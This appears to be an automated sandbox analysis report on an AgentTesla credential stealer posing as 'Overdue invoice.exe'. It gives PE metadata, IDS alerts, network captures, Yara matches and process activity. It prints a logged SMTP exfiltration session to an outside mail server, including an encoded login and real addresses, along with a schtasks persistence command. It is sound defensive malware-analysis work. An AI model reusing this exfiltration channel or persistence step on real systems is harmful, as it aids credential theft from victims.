                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x20000x7dea00x7e000False0.818219866071data7.65168574947IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                  .rsrc0x800000x345bc0x34600False0.445009509248data6.26427887157IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0xb60000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountry
                                                  RT_ICON0x802b00xc5d8PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                  RT_ICON0x8c8880x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                                  RT_ICON0x9d0b00x94a8data
                                                  RT_ICON0xa65580x5488data
                                                  RT_ICON0xab9e00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295
                                                  RT_ICON0xafc080x25a8data
                                                  RT_ICON0xb21b00x10a8data
                                                  RT_ICON0xb32580x988data
                                                  RT_ICON0xb3be00x468GLS_BINARY_LSB_FIRST
                                                  RT_GROUP_ICON0xb40480x84data
                                                  RT_VERSION0xb40cc0x33cdata
                                                  RT_MANIFEST0xb44080x1b4XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators

                                                  Imports

                                                  DLLImport
                                                  mscoree.dll_CorExeMain

                                                  Version Infos

                                                  DescriptionData
                                                  Translation0x0000 0x04b0
                                                  LegalCopyrightCopyright 2015
                                                  Assembly Version1.0.0.0
                                                  InternalNamecCjl.exe
                                                  FileVersion1.0.0.0
                                                  CompanyNameFCSF
                                                  LegalTrademarks
                                                  Comments
                                                  ProductNameEvent Transmission
                                                  ProductVersion1.0.0.0
                                                  FileDescriptionEvent Transmission
                                                  OriginalFilenamecCjl.exe

                                                  Network Behavior

                                                  Snort IDS Alerts

                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                  192.168.2.3206.183.111.188497155872840032 05/27/22-12:53:52.919110TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249715587192.168.2.3206.183.111.188
                                                  192.168.2.3206.183.111.188497155872030171 05/27/22-12:53:52.919010TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49715587192.168.2.3206.183.111.188
                                                  192.168.2.3206.183.111.188497455872030171 05/27/22-12:54:26.668198TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49745587192.168.2.3206.183.111.188
                                                  192.168.2.3206.183.111.188497155872839723 05/27/22-12:53:52.919010TCP2839723ETPRO TROJAN Win32/Agent Tesla SMTP Activity49715587192.168.2.3206.183.111.188
                                                  192.168.2.3206.183.111.188497455872840032 05/27/22-12:54:26.668311TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249745587192.168.2.3206.183.111.188
                                                  192.168.2.3206.183.111.188497455872839723 05/27/22-12:54:26.668198TCP2839723ETPRO TROJAN Win32/Agent Tesla SMTP Activity49745587192.168.2.3206.183.111.188

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  May 27, 2022 12:53:50.993177891 CEST49715587192.168.2.3206.183.111.188
                                                  May 27, 2022 12:53:51.123843908 CEST58749715206.183.111.188192.168.2.3
                                                  May 27, 2022 12:53:51.123989105 CEST49715587192.168.2.3206.183.111.188
                                                  May 27, 2022 12:53:51.877722979 CEST58749715206.183.111.188192.168.2.3
                                                  May 27, 2022 12:53:51.918479919 CEST49715587192.168.2.3206.183.111.188
                                                  May 27, 2022 12:53:51.957850933 CEST49715587192.168.2.3206.183.111.188
                                                  May 27, 2022 12:53:52.088825941 CEST58749715206.183.111.188192.168.2.3
                                                  May 27, 2022 12:53:52.137103081 CEST49715587192.168.2.3206.183.111.188
                                                  May 27, 2022 12:53:52.178985119 CEST49715587192.168.2.3206.183.111.188
                                                  May 27, 2022 12:53:52.310087919 CEST58749715206.183.111.188192.168.2.3
                                                  May 27, 2022 12:53:52.364459991 CEST49715587192.168.2.3206.183.111.188
                                                  May 27, 2022 12:53:52.507563114 CEST58749715206.183.111.188192.168.2.3
                                                  May 27, 2022 12:53:52.508352995 CEST49715587192.168.2.3206.183.111.188
                                                  May 27, 2022 12:53:52.638927937 CEST58749715206.183.111.188192.168.2.3
                                                  May 27, 2022 12:53:52.639225006 CEST49715587192.168.2.3206.183.111.188
                                                  May 27, 2022 12:53:52.786659956 CEST58749715206.183.111.188192.168.2.3
                                                  May 27, 2022 12:53:52.786880970 CEST49715587192.168.2.3206.183.111.188
                                                  May 27, 2022 12:53:52.917552948 CEST58749715206.183.111.188192.168.2.3
                                                  May 27, 2022 12:53:52.917664051 CEST58749715206.183.111.188192.168.2.3
                                                  May 27, 2022 12:53:52.919009924 CEST49715587192.168.2.3206.183.111.188
                                                  May 27, 2022 12:53:52.919110060 CEST49715587192.168.2.3206.183.111.188
                                                  May 27, 2022 12:53:52.919651031 CEST49715587192.168.2.3206.183.111.188
                                                  May 27, 2022 12:53:52.919720888 CEST49715587192.168.2.3206.183.111.188
                                                  May 27, 2022 12:53:53.050086975 CEST58749715206.183.111.188192.168.2.3
                                                  May 27, 2022 12:53:53.050416946 CEST58749715206.183.111.188192.168.2.3
                                                  May 27, 2022 12:53:53.054867029 CEST58749715206.183.111.188192.168.2.3
                                                  May 27, 2022 12:53:53.262171030 CEST49715587192.168.2.3206.183.111.188
                                                  May 27, 2022 12:54:22.889226913 CEST49745587192.168.2.3206.183.111.188
                                                  May 27, 2022 12:54:23.023149014 CEST58749745206.183.111.188192.168.2.3
                                                  May 27, 2022 12:54:23.025516987 CEST49745587192.168.2.3206.183.111.188
                                                  May 27, 2022 12:54:25.429943085 CEST58749745206.183.111.188192.168.2.3
                                                  May 27, 2022 12:54:25.444358110 CEST49745587192.168.2.3206.183.111.188
                                                  May 27, 2022 12:54:25.578612089 CEST58749745206.183.111.188192.168.2.3
                                                  May 27, 2022 12:54:25.582864046 CEST49745587192.168.2.3206.183.111.188
                                                  May 27, 2022 12:54:25.717389107 CEST58749745206.183.111.188192.168.2.3
                                                  May 27, 2022 12:54:25.743762970 CEST49745587192.168.2.3206.183.111.188
                                                  May 27, 2022 12:54:25.893343925 CEST58749745206.183.111.188192.168.2.3
                                                  May 27, 2022 12:54:25.893627882 CEST49745587192.168.2.3206.183.111.188
                                                  May 27, 2022 12:54:26.028583050 CEST58749745206.183.111.188192.168.2.3
                                                  May 27, 2022 12:54:26.028840065 CEST49745587192.168.2.3206.183.111.188
                                                  May 27, 2022 12:54:26.177023888 CEST58749745206.183.111.188192.168.2.3
                                                  May 27, 2022 12:54:26.218147993 CEST49745587192.168.2.3206.183.111.188
                                                  May 27, 2022 12:54:26.500936985 CEST49745587192.168.2.3206.183.111.188
                                                  May 27, 2022 12:54:26.634860992 CEST58749745206.183.111.188192.168.2.3
                                                  May 27, 2022 12:54:26.634953022 CEST58749745206.183.111.188192.168.2.3
                                                  May 27, 2022 12:54:26.668198109 CEST49745587192.168.2.3206.183.111.188
                                                  May 27, 2022 12:54:26.668311119 CEST49745587192.168.2.3206.183.111.188
                                                  May 27, 2022 12:54:26.668384075 CEST49745587192.168.2.3206.183.111.188
                                                  May 27, 2022 12:54:26.668456078 CEST49745587192.168.2.3206.183.111.188
                                                  May 27, 2022 12:54:26.803858042 CEST58749745206.183.111.188192.168.2.3
                                                  May 27, 2022 12:54:26.803900957 CEST58749745206.183.111.188192.168.2.3
                                                  May 27, 2022 12:54:26.809715033 CEST58749745206.183.111.188192.168.2.3
                                                  May 27, 2022 12:54:26.858817101 CEST49745587192.168.2.3206.183.111.188
                                                  May 27, 2022 12:55:29.490083933 CEST49715587192.168.2.3206.183.111.188
                                                  May 27, 2022 12:55:29.660953045 CEST58749715206.183.111.188192.168.2.3
                                                  May 27, 2022 12:55:29.823596954 CEST58749715206.183.111.188192.168.2.3
                                                  May 27, 2022 12:55:29.823791027 CEST49715587192.168.2.3206.183.111.188
                                                  May 27, 2022 12:55:29.823844910 CEST49715587192.168.2.3206.183.111.188
                                                  May 27, 2022 12:55:29.954498053 CEST58749715206.183.111.188192.168.2.3

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  May 27, 2022 12:53:49.667876959 CEST4931653192.168.2.38.8.8.8
                                                  May 27, 2022 12:53:50.838224888 CEST4931653192.168.2.38.8.8.8
                                                  May 27, 2022 12:53:50.942549944 CEST53493168.8.8.8192.168.2.3
                                                  May 27, 2022 12:54:22.740289927 CEST5811653192.168.2.38.8.8.8
                                                  May 27, 2022 12:54:22.844952106 CEST53581168.8.8.8192.168.2.3

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                  May 27, 2022 12:53:49.667876959 CEST192.168.2.38.8.8.80xb85eStandard query (0)mail.jkudyog.comA (IP address)IN (0x0001)
                                                  May 27, 2022 12:53:50.838224888 CEST192.168.2.38.8.8.80xb85eStandard query (0)mail.jkudyog.comA (IP address)IN (0x0001)
                                                  May 27, 2022 12:54:22.740289927 CEST192.168.2.38.8.8.80xf7d3Standard query (0)mail.jkudyog.comA (IP address)IN (0x0001)

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                  May 27, 2022 12:53:50.942549944 CEST8.8.8.8192.168.2.30xb85eNo error (0)mail.jkudyog.com206.183.111.188A (IP address)IN (0x0001)
                                                  May 27, 2022 12:54:22.844952106 CEST8.8.8.8192.168.2.30xf7d3No error (0)mail.jkudyog.com206.183.111.188A (IP address)IN (0x0001)

                                                  SMTP Packets

                                                  TimestampSource PortDest PortSource IPDest IPCommands
                                                  May 27, 2022 12:53:51.877722979 CEST58749715206.183.111.188192.168.2.3220-hulk.rapidns.com ESMTP Exim 4.95 #2 Fri, 27 May 2022 16:23:51 +0530
                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                  220 and/or bulk e-mail.
                                                  May 27, 2022 12:53:51.957850933 CEST49715587192.168.2.3206.183.111.188EHLO 701188
                                                  May 27, 2022 12:53:52.088825941 CEST58749715206.183.111.188192.168.2.3250-hulk.rapidns.com Hello 701188 [102.129.143.42]
                                                  250-SIZE 52428800
                                                  250-8BITMIME
                                                  250-PIPELINING
                                                  250-PIPE_CONNECT
                                                  250-AUTH PLAIN LOGIN
                                                  250-STARTTLS
                                                  250 HELP
                                                  May 27, 2022 12:53:52.178985119 CEST49715587192.168.2.3206.183.111.188AUTH login YXNodXRvc2hAamt1ZHlvZy5jb20=
                                                  May 27, 2022 12:53:52.310087919 CEST58749715206.183.111.188192.168.2.3334 UGFzc3dvcmQ6
                                                  May 27, 2022 12:53:52.507563114 CEST58749715206.183.111.188192.168.2.3235 Authentication succeeded
                                                  May 27, 2022 12:53:52.508352995 CEST49715587192.168.2.3206.183.111.188MAIL FROM:<ashutosh@jkudyog.com>
                                                  May 27, 2022 12:53:52.638927937 CEST58749715206.183.111.188192.168.2.3250 OK
                                                  May 27, 2022 12:53:52.639225006 CEST49715587192.168.2.3206.183.111.188RCPT TO:<markhung@jingtai.com.vn>
                                                  May 27, 2022 12:53:52.786659956 CEST58749715206.183.111.188192.168.2.3250 Accepted
                                                  May 27, 2022 12:53:52.786880970 CEST49715587192.168.2.3206.183.111.188DATA
                                                  May 27, 2022 12:53:52.917664051 CEST58749715206.183.111.188192.168.2.3354 Enter message, ending with "." on a line by itself
                                                  May 27, 2022 12:53:52.919720888 CEST49715587192.168.2.3206.183.111.188.
                                                  May 27, 2022 12:53:53.054867029 CEST58749715206.183.111.188192.168.2.3250 OK id=1nuXbN-000NU7-4h
                                                  May 27, 2022 12:54:25.429943085 CEST58749745206.183.111.188192.168.2.3220-hulk.rapidns.com ESMTP Exim 4.95 #2 Fri, 27 May 2022 16:24:25 +0530
                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                  220 and/or bulk e-mail.
                                                  May 27, 2022 12:54:25.444358110 CEST49745587192.168.2.3206.183.111.188EHLO 701188
                                                  May 27, 2022 12:54:25.578612089 CEST58749745206.183.111.188192.168.2.3250-hulk.rapidns.com Hello 701188 [102.129.143.42]
                                                  250-SIZE 52428800
                                                  250-8BITMIME
                                                  250-PIPELINING
                                                  250-PIPE_CONNECT
                                                  250-AUTH PLAIN LOGIN
                                                  250-STARTTLS
                                                  250 HELP
                                                  May 27, 2022 12:54:25.582864046 CEST49745587192.168.2.3206.183.111.188AUTH login YXNodXRvc2hAamt1ZHlvZy5jb20=
                                                  May 27, 2022 12:54:25.717389107 CEST58749745206.183.111.188192.168.2.3334 UGFzc3dvcmQ6
                                                  May 27, 2022 12:54:25.893343925 CEST58749745206.183.111.188192.168.2.3235 Authentication succeeded
                                                  May 27, 2022 12:54:25.893627882 CEST49745587192.168.2.3206.183.111.188MAIL FROM:<ashutosh@jkudyog.com>
                                                  May 27, 2022 12:54:26.028583050 CEST58749745206.183.111.188192.168.2.3250 OK
                                                  May 27, 2022 12:54:26.028840065 CEST49745587192.168.2.3206.183.111.188RCPT TO:<markhung@jingtai.com.vn>
                                                  May 27, 2022 12:54:26.177023888 CEST58749745206.183.111.188192.168.2.3250 Accepted
                                                  May 27, 2022 12:54:26.500936985 CEST49745587192.168.2.3206.183.111.188DATA
                                                  May 27, 2022 12:54:26.634953022 CEST58749745206.183.111.188192.168.2.3354 Enter message, ending with "." on a line by itself
                                                  May 27, 2022 12:54:26.668456078 CEST49745587192.168.2.3206.183.111.188.
                                                  May 27, 2022 12:54:26.809715033 CEST58749745206.183.111.188192.168.2.3250 OK id=1nuXbu-000NXK-Rm
                                                  May 27, 2022 12:55:29.490083933 CEST49715587192.168.2.3206.183.111.188QUIT
                                                  May 27, 2022 12:55:29.823596954 CEST58749715206.183.111.188192.168.2.3221 hulk.rapidns.com closing connection

                                                  Statistics

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:12:53:16
                                                  Start date:27/05/2022
                                                  Path:C:\Users\user\Desktop\Overdue invoice.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\Overdue invoice.exe"
                                                  Imagebase:0x520000
                                                  File size:731648 bytes
                                                  MD5 hash:21C2F8CC3F1D71FFB036CA3788A346B6
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.302129408.0000000003B92000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.302129408.0000000003B92000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.300706050.000000000393F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.300706050.000000000393F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low

                                                  General

                                                  Target ID:3
                                                  Start time:12:53:33
                                                  Start date:27/05/2022
                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dYXeRswtYBrq" /XML "C:\Users\user\AppData\Local\Temp\tmpA306.tmp
                                                  Imagebase:0xf00000
                                                  File size:185856 bytes
                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Target ID:4
                                                  Start time:12:53:34
                                                  Start date:27/05/2022
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7c9170000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Target ID:5
                                                  Start time:12:53:34
                                                  Start date:27/05/2022
                                                  Path:C:\Users\user\Desktop\Overdue invoice.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:{path}
                                                  Imagebase:0x2f0000
                                                  File size:731648 bytes
                                                  MD5 hash:21C2F8CC3F1D71FFB036CA3788A346B6
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low

                                                  General

                                                  Target ID:7
                                                  Start time:12:53:35
                                                  Start date:27/05/2022
                                                  Path:C:\Users\user\Desktop\Overdue invoice.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:{path}
                                                  Imagebase:0xfe0000
                                                  File size:731648 bytes
                                                  MD5 hash:21C2F8CC3F1D71FFB036CA3788A346B6
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.519470076.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000007.00000002.519470076.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000000.294988702.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000007.00000000.294988702.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000000.295945880.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000007.00000000.295945880.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000000.295465407.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000007.00000000.295465407.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000000.294210578.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000007.00000000.294210578.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.521991645.0000000003401000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.521991645.0000000003401000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low

                                                  General

                                                  Target ID:15
                                                  Start time:12:53:53
                                                  Start date:27/05/2022
                                                  Path:C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe"
                                                  Imagebase:0x8d0000
                                                  File size:731648 bytes
                                                  MD5 hash:21C2F8CC3F1D71FFB036CA3788A346B6
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.378013888.0000000003CEF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000F.00000002.378013888.0000000003CEF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 60%, ReversingLabs
                                                  Reputation:low

                                                  General

                                                  Target ID:16
                                                  Start time:12:54:01
                                                  Start date:27/05/2022
                                                  Path:C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe"
                                                  Imagebase:0x830000
                                                  File size:731648 bytes
                                                  MD5 hash:21C2F8CC3F1D71FFB036CA3788A346B6
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.373874318.0000000003C5F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000010.00000002.373874318.0000000003C5F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low

                                                  General

                                                  Target ID:17
                                                  Start time:12:54:05
                                                  Start date:27/05/2022
                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dYXeRswtYBrq" /XML "C:\Users\user\AppData\Local\Temp\tmp2055.tmp
                                                  Imagebase:0xf00000
                                                  File size:185856 bytes
                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Target ID:18
                                                  Start time:12:54:06
                                                  Start date:27/05/2022
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7c9170000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Target ID:19
                                                  Start time:12:54:06
                                                  Start date:27/05/2022
                                                  Path:C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:{path}
                                                  Imagebase:0xbe0000
                                                  File size:731648 bytes
                                                  MD5 hash:21C2F8CC3F1D71FFB036CA3788A346B6
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000000.366458580.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000013.00000000.366458580.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000000.366994504.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000013.00000000.366994504.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000000.365073156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000013.00000000.365073156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000000.365965578.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000013.00000000.365965578.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.519516875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000013.00000002.519516875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low

                                                  Disassembly

                                                  No disassembly